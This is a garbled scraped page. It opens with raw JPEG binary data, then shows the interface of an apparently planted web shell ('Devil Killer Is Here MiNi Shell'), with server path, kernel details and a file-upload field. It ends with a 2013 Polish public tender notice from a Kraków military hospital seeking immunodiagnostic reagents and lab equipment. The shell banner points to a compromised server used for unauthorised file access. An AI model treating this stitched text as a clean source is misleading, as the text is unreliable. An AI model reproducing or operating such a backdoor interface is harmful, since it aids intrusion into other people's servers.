JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/17263-N-2013.html

<p class="kh_header"><b>Kraków: DOSTAWA ODCZYNNIKÓW DO  IMMUNODIAGNOSTYKI WRAZ Z DZIERŻAWĄ SPRZĘTU LABORATORYJNEGO</b><br>
<b>Numer ogłoszenia: 17263 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW DO  IMMUNODIAGNOSTYKI WRAZ Z DZIERŻAWĄ SPRZĘTU LABORATORYJNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia (cha-rakterystyka, wymiary  itp.)	
Kod CPV	Ilość jedn.miary	kwota netto
za j.m.	wartość netto	stawka VAT	wartość brutto	numer katalogowy
1	

DIAGNOSTYKA PRZECIWCIAŁ W KIERUNKU CELIAKII - TRANSGLUTAMINAZA TKAN-KOWA - TESTEM ELISA ( TEST  ILOŚCIOWY DO OZNACZANIA PRZECIWCIAŁ W KLASIE IgA )
	33696500-0	96 ozn					
2	
DIAGNOSTYKA PRZECIWCIAŁ W KIERUNKU CELIAKII - TRANSGLUTAMINAZA TKAN-KOWA - TESTEM ELISA ( TEST  ILOŚCIOWY DO OZNACZANIA PRZECIWCIAŁ W KLASIE IgG )
	33696500-0	96 ozn					
3	
DIAGNOSTYKA PRZECIWCIAŁ PRZECIWKO ANALOGOM 
(3 SEKWENCJE POŁĄCZONYCH NONAPEP-TYDÓW GLIADYNY) PEPTYDÓW GLIADYNY W KLASIE IgG  TESTEM ILOSCIOWYM ELISA
	33696500-0	96 ozn					
4	
PASKOWY TEST  POTWIERDZENIA PRZE-CIWCIAŁ PRZECIWKO BORRELIOZIE METO-DĄ WESTERNBLOT  W KLASIE IgG
( PEŁNY EKSTRAKT KOMÓREK BORRELIA AFZELLI)
	33696500-0	32 ozn					
5	
PASKOWY TEST POTWIERDZENIA PRZE-CIWCIAŁ PRZECIWKO BORRELIOZIE METO-DĄ WESTERNBLOT  W KLASIE IgM
( PEŁNY EKSTRAKT KOMÓREK BORRELIA AFZELLI)
	33696500-0	32 ozn					
6	
PASKOWY TEST DO DIAGNOSTYKI AUTO-IMMUNOLOGICZNYCH CHORÓB WĄTROBY Z PASKIEM  KONTROLNYM
( AMA-M2, M2-3E (BPO), Sp100, PML, gp210, LKM-1, LC-1, SLA/LP, Ro-52, Linia kontrolna

	33696500-0	80 ozn					
7	
DIAGNOSTYKA PRZECIWCIAŁ CCP - ANTY-GEN DRUGIEJ GENERACJI - W KLASIE IgG  TESTEM ELISA - OZNACZENIE ILOŚCIOWE	33696500-0	192 ozn					
8	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW SACCHAROMYCES CEREVISIAE -W KLASIE IgA TESTEM ELISA - OZNACZENIE ILO-ŚCIOWE

	33696500-0	192 ozn					
9	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW SACCHAROMYCES CEREVISIAE -W KLASIE IgG TESTEM ELISA - OZNACZENIE ILO-ŚCIOWE
	33696500-0	192 ozn					
10	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  PARVOWIRUSOWI B19-W KLASIE IgG TE-STEM ELISA - OZNACZENIE ILOŚCIOWE
	33696500-0	96 ozn					
11	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  PARVOWIRUSOWI B19-W KLASIE IgM TE-STEM ELISA - OZNACZENIE ILOŚCIOWE
	33696500-0	96 ozn					
12	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  BIAŁKU Sa W  KLASIE IgG TESTEM ELISA - OZNACZENIE ILOŚCIOWE
	33696500-0	48 ozn					
13	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  MYCOPLASMA PNEUMONIAE  W  KLASIE IgA TESTEM ELISA - OZNACZENIE PÓŁILO-ŚCIOWE
	33696500-0	288 ozn					
14	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  MYCOPLASMA PNEUMONIAE  W  KLASIE IgG TESTEM ELISA - OZNACZENIE ILO-ŚCIOWE
	33696500-0	384 ozn					
15	
BUFOR DO ROZCIEŃCZANIA PRÓBEK W KLASIE IgM PRZECIW MYCOPLASMA PNEUMONIAE ZAWIERAJĄCY ABSORBENT PRZECIWCIAŁ IgG I RF	33696500-0	288 ozn					
16	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  CHLAMYDIA PNEUMONIAE  W  KLASIE IgA TESTEM ELISA - OZNACZENIE PÓŁILO-ŚCIOWE
	33696500-0	288 ozn					
17	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  CHLAMYDIA PNEUMONIAE  W  KLASIE IgG TESTEM ELISA - OZNACZENIE ILOŚCIOWE
	33696500-0	384 ozn					
18	
BUFOR DO ROZCIEŃCZANIA PRÓBEK W KLASIE IgM PRZECIW CHLAMYDIA PNEU-MONIAE ZAWIERAJĄCY ABSORBENT PRZE-CIWCIAŁ IgG I RF	33696500-0	288 ozn					
19	DIAGNOSTYKA PRZECIWCIAŁ  PRZECIW  KOMÓRKOM OKŁADZINOWYM ŻOŁĄDKA W KLASIE IgG - TESTEM ELISA- OZNACZENIE ILOŚCIOWE
	33696500-0	96 ozn					
20	
DIAGNOSTYKA PRZECIWCIAŁ  PRZECIWKO RECEPTOROM TSH W KLASIE IgG FAST- TESTEM ELISA- OZNACZENIE ILOŚCIOWE
	33696500-0	384 ozn					
21	
TEST ELISA DO DIAGNOSTYKI YERSINIA ENTEROCOLITICA W KLASIE IgA
	33696500-0	16 ozn					
22	
TEST ELISA DO DIAGNOSTYKI YERSINIA ENTEROCOLITICA W KLASIE IGG
	33696500-0	16 ozn					
23	
TEST PASKOWY DO DIAGNOSTYKI BORDA-TELLA PERTUSSIS W KLASIE IgA
	33696500-0	16 ozn					
24	
TEST PASKOWY DO DIAGNOSTYKI BORDA-TELLA PERTUSSIS W KLASIE IgG	33696500-0	16 ozn					
25	
TEST PASKOWY DO DIAGNOSTYKI HELICO-BACTER PYLORI W KLASIE IgA
	33696500-0	16 ozn					
26	
TEST PASKOWY DO DIAGNOSTYKI HELICO-BACTER PYLORI W KLASIE IgG
	33696500-0	16 ozn					
27	
DIAGNOSTYKA PRZECIWCIAŁ PRZECIW KARDIOLIPINOM
W KLASIE IgG
  TESTEM ELISA - AMA M 1
(ANTYGEN:  NATYWNY IZOLOWANY Z SERCA BYDLĘCEGO)
	33696500-0	96 ozn 					
28	
DIAGNOSTYKA PRZECIWCIAŁ PRZECIW KARDIOLIPINOM 
W KLASIE IgM  TESTEM ELISA 
- AMA M 1
(ANTYGEN:  NATYWNY IZOLOWANY Z SERCA BYDLĘCEGO)
	33696500-0	96 ozn 					
29	
PASKOWY TEST DO DIAGNOSTYKI PRZE-CIWCIAŁ ONKONEURONALNYCH
( AMFIFIZYNA, CV2.1, Ma-2, Ri, Yo, Hu)
	33696500-0	16 ozn					
30	
TEST ELISA DO DIAGNOSTYKI CAMPYLO-BACTER JEJUNI W KLASIE IgA
	33696500-0	96 ozn					
31	
TEST ELISA DO DIAGNOSTYKI CAMPYLO-BACTER JEJUNI W KLASIE IgG
	33696500-0	96 ozn					
32	
DIAGNOSTYKA PRZECIWCIAŁ ANTYGAD  W KLASIE IgG TESTEM ELISA - OZNACZENIE ILOŚCIOWE
	33696500-0	96 ozn					
33	
PASKOWY TEST DO DIAGNOSTYKI PRZE-CIWCIAŁ PRZECIWKO GANGLIOZYDOM W KLASIE  IgG TESTEM PASKOWYM TYPU BLOT (GM1, GM2, GM3, GD1a, GD1b, GT1b, GQ1b)
	33696500-0	16 ozn					
34	
PASKOWY TEST DO DIAGNOSTYKI PRZE-CIWCIAŁ PRZECIWKO GANGLIOZYDOM W KLASIE  IgM TESTEM PASKOWYM TYPU BLOT (GM1, GM2, GM3, GD1a, GD1b, GT1b, GQ1b)

	33696500-0	16 ozn					
	RAZEM 							
1.	Cena brutto zawiera koszt Przedmiotu Umowy, wszelkie koszty związane z dostarczeniem Przedmiotu Umowy do siedziby Kupującego (Zakład Analityki Lekarskiej, 5WSzKzP - SP ZOZ w Krakowie, ul. Wrocławska 1-3, 30-901 Kraków), zakładany zysk, należne podatki, koszt ubezpieczenia obowiązkowego, opakowania i inne, je-śli występują.
2.	Cena oferty winna być wyrażona w złotych polskich, nie dopuszcza się rozliczeń w walutach obcych.
3.	Wykonawca winien określić dla poszczególnych pozycji ofertowych ceny jednostkowe netto oraz stawkę procentową VAT, a następnie obliczyć dla poszczególnych pozycji ofertowych wartość netto przez przemnożenie ceny jednostkowej netto przez ilość / j. m. oraz dla poszczególnych pozycji ofertowych wartość brutto przez prze-mnożenie wartości netto danej pozycji przez stawkę procentową VAT (uzyskany iloczyn dodać do wartości netto danej pozycji). Suma wartości (odpowiednio: net-to / brutto) poszczególnych pozycji ofertowych z kolumn (odpowiednio: wartość netto/ wartość brutto) stanowić będzie wartość (netto, brutto) dla pozycji RAZEM. Wszystkie wartości kosztorysowe wykonawca zobowiązany jest kalkulować i wpisywać w zaokrągleniu do dwóch miejsc po przecinku.
4.	Wykonawca powinien wypełnić wszystkie oraz wycenić wszystkie pozycje wchodzące w skład poszczególnych pakietu.
II.        CZYNSZ DZIERŻAWNY 
Lp.	Przedmiot dzierżawy	Cena netto za mie-siąc dzierża-wy(sprzęt laborato-ryjny)	Cena brutto za mie-siąc dzierża-wy(sprzęt laborato-ryjny)	Cena netto za cały okres trwania umowy(sprzęt laboratoryjny)	Cena brutto za cały okres trwania umowy(sprzęt laboratoryjny)
1.	Czytnik ELISA z drukarką i  komputerem zawierającym oprogramowanie w języku pol-skim,  automatyczna płuczka  do mikropłytek, skaner z oprogramowaniem w języku polskim, kołyska laboratoryjna oraz wytrząsarka rotacyjna  o prędkości  około 500 obro-tów/min. potrzebne do  przeprowadzenia testów.
				

Czynsz dzierżawny zawiera wszelkie ciężary(w tym koszt części i materiałów eksploatacyjnych do przeglądu) związane ze sprawowaniem nadzoru serwisowego nad przed-miotem dzierżawy(pełny nadzór).


III.         ŁĄCZNA WARTOŚĆ ZAMÓWIENIA
ŁĄCZNA WARTOŚĆ ZAMÓWIENIA
	Wartość netto  w zł	Wartość brutto w zł
1.	ODCZYNNIKI		
2.	CZYNSZ DZIERŻAWNY SPRZĘTU LABORATORYJNEGO  (za cały okres trwania umowy)		
RAZEM		
Zestawienie warunków granicznych


LP	                 Zestawienie warunków granicznych 	WARUNEK GRANICZNY	WARUNEK OFEROWANY
1.	Czytnik ELISA z  drukarką i komputerem zawierającym oprogramowanie w języku polskim,  automatyczna płuczka  do mikropłytek, skaner z oprogramowa-niem w języku polskim, kołyska laboratoryjna oraz wytrząsarka rotacyjna  o prędkości  około 500 obrotów min. potrzebne do  przeprowadzenia testów.
	TAK	wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych posta-wionych przez Zamawiającego
2. 	Dla  pozycji:  4, 5, 21, 22, 23, 24, 25, 26, 29, 33, 34   wymagana ilość testów w zestawie  od 15 do 17.
	TAK	wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych posta-wionych przez Zamawiającego
3.	Bezpłatne szkolenie personelu we wszystkich technikach pomiarowych - wyko-nanie badań  i interpretacja wyników.
	TAK	wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych postawionych przez Zamawiającego
4.	Pomoc merytoryczna w interpretacji wyników przez cały czas trwania umowy
	TAK	wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych posta-wionych przez Zamawiającego
5.	Zapewnienie udziału w międzynarodowej kontroli jakości badań z opracowa-niem statystycznym wyników przez dostarczenie odpowiednich materiałów kon-trolnych na koszt oferenta.	TAK	wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych posta-wionych przez Zamawiającego

V.         Zestawienie warunków granicznych zestawu komputerowego
                 Zestawienie warunków granicznych 	WARUNEK GRANICZNY	WARUNEK OFEROWANY

Zestaw komputerowy zapewniający współpracę z siecią komputerową Zakładu Analityki Lekarskiej (komunikacja dwukierunkowa) i systemem Centrum firmy Marcel.

Wymagany jest zestaw komputerowy wyposażony  w licencję dostępową CAL Device PL umożliwiającą jego podłączenie do domeny Windows 2008 działającej w oparciu o system Windows Server Std. 2008 OEM


Przykładowa konfiguracja komputera spełniającego wymagania:

Procesor :					dwurdzeniowy, min 2,5GHz

Pamięć operacyjna :				min. 2 GB

Pamięć masowa :				min. 160 GB SATA

Karta graficzna

Napęd optyczny :				nagrywarka DVD-RW

Obudowa  ATX

System operacyjny :				Windows XP PL Prof. lub Windows 7 PL Prof.

Licencja dostępowa CAL Device PL
dla domeny Windows 2008

Zewnętrzne porty USB :				min.4 szt.

Porty szeregowe RS-232 (9pin): 			min.2 szt.

Karta sieciowa :					Ethernet min. 100 Mb s

Klawiatura: 					USB, standard QWERTY

Mysz: 						optyczna laserowa USB z rolką

UPS: 						dostosowany do konfigura-cji komputera

Listwa zasilająca 

Monitor :  LCD o przekątnej min. 19

Drukarka laserowa typu Brother HL-2035 lub równoważna

Kabel USB 2.0
	

                TAK	 

 wpisać słowo TAK na potwierdzenie spełnienie warunków granicznych posta-wionych przez Zamawiającego oraz opi-sać.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Podpisany i wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - we-dług ZAŁĄCZNIKA NR 1.
3.	Pełnomocnictwo do prowadzenia negocjacji w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
4.	Oświadczenie Wykonawcy w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3.
5.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	Dla wszystkich pozycji, które tego wymagają, zawartych w OPISIE PRZEDMIOTU ZAMÓWIENIA  karty charakterystyki substancji niebezpiecznych i preparatów niebezpiecznych, o których mowa w art. 5 ust. 1 ustawy z 11 stycznia 2001 roku o substancjach i preparatach chemicznych a także karty charakterystyki preparatów o których mowa w art. 5 ust. 6 powyższej ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący dopuszcza możliwość zmiany treści niniejszej umowy w zakresie wskazanym w powyższych paragrafach oraz w zakresie:
zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpre-tacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Kupującego
innych zmian korzystnych dla Kupującego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z konieczno-ścią zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne, (budynek Komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





